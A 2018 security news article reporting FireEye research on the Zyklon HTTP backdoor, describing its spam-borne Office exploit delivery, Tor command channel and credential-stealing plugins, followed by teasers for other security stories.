Story image

Zyklon HTTP malware creates gaping backdoors through MS Office exploits

22 Jan 18

Telecommunications, insurance and financial service providers are the latest targets of a multi-feature backdoor malware called Zyklon, which can conduct a number of different attacks from DDoS to keylogging.

Researchers Swapnil Patil and Yogesh Londhe from FireEye explain that while Zyklon has been in the wild in 2016, the recent wave is attaching to spam emails to deliver its malware.

Zyklon HTTP malware is described as a publicly-available and fully featured backdoor that is able to conduct DDoS attacks, steal passwords, act as a keylogger, update and remove itself; and acts as a downloader for additional plugins.

The malware can range from $75-$125 on underground marketplaces.

The latest wave arrives as a spam .ZIP attachment. That attachment contains a malicious .DOC file.

“The document files exploit at least three known vulnerabilities in Microsoft Office, which we discuss in the Infection Techniques section. Upon execution in a vulnerable environment, the PowerShell based payload takes over,” Researchers explain.

They go on to say that PowerShell is able to download the final payment from the Command & Control centre to execute the malware.

The malware uses two specific vulnerabilities to infect machines: The first vulnerability CVE-2017-8759 enables an attacker to use a malicious document for remote code execution.

The second vulnerability CVE-2017-11882 is a recently-discovered vulnerability that takes advantage of various versions of Microsoft Office 2016, 2013, 2010 and 2007.

It uses ‘Microsoft Office Memory Corruption Vulnerability’ and allows an attacker to run code in memory.

Researchers also say that Zyklon uses the Tor network as its Command and Control communication.

Researchers say that Zyklon can download additional plugins that include:

Browser Password Recovery, which can recover passwords from popular web browsers including Google Chrome, Mozille Firefox, Apple Safari, Internet Explorer, Comodo Dragon Browser, Opera Browser, Chrome Canary/SXS, CoolNovo Broswser, Flock Browser, SeaMonkey Browser and SRWare Iron Browser.

FTP Password Recovery, which can steal passwords from FTP applications including FileZilla, Dreamweaver, SmartFTP, FlashFXP, FTPCommander and WS_FTP.

Gaming Software Key Recovery, which steals keys from games including Age of Empires, FIFA, Call of Duty, NFS, The Sims, Quake, Half-Live, IGI and Star Wars.

Email Password Recovery, which can steal passwords from Microsoft Outlook and Microsoft Outlook Express, Mozilla Thunderbird, Windows Live Mail 2012, Incredimail, Foxmail, Windows Live Messenger, MSN Messenger, Windows Credential Manager, Google Talk, Gmail Notifier, PaltalkScene IM, Pidgin Messenger and Miranda Messenger.

Licence Key Recovery, which steals serial keys from popular software including Adobe, Microsoft Office, SQL Server and Nero.

Socks5 Proxy, which can create a reverse Socks5 proxy server.

The Zyklon malware can also hijack a user’s clipboard and can replaces a user’s copied Bitcoin address with one from the Zyklon control server.

Using blockchain to ensure regulatory compliance
“Data privacy regulations such as the GDPR require you to put better safeguards in place to protect customer data, and to prove you’ve done it."
A10 aims to secure Kubernetes container environments
The solution aims to provide teams deploying microservices applications with an automated way to integrate enterprise-grade security with comprehensive application visibility and analytics.
DigiCert conquers Google's distrust of Symantec certs
“This could have been an extremely disruptive event to online commerce," comments DigiCert CEO John Merrill. 
One Identity a Visionary in Magic Quad for PAM
One Identity was recognised in the Gartner Magic Quadrant for Privileged Access Management for completeness of vision and ability to execute.
Gartner names newcomer Exabeam a leader in SIEM
The vendor landscape for SIEM is evolving, with recent entrants bringing technologies optimised for analytics use cases.
52mil users affected by Google+’s second data breach
Google+ APIs will be shut down within the next 90 days, and the consumer platform will be disabled in April 2019 instead of August 2019 as originally planned.
Symantec releases neural network-integrated USB scanning station
Symantec Industrial Control System Protection Neural helps defend against USB-borne cyber attacks on operational technology.
Ramping up security with next-gen firewalls
The classic firewall lacked the ability to distinguish between different kinds of web traffic.